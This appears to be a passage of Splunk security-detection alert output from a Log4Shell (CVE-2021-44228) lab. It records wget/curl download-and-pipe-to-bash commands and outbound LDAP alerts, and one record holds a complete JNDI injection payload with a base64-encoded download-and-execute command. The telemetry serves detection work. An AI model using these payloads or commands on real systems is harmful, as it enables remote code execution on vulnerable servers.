endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", 
annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", 
annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO 
- http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool 
Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647253, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Command and Control", annotations._all="T1059", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", 
latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642647252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642647253, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Command and Control", annotations._all="T1059", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642647252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
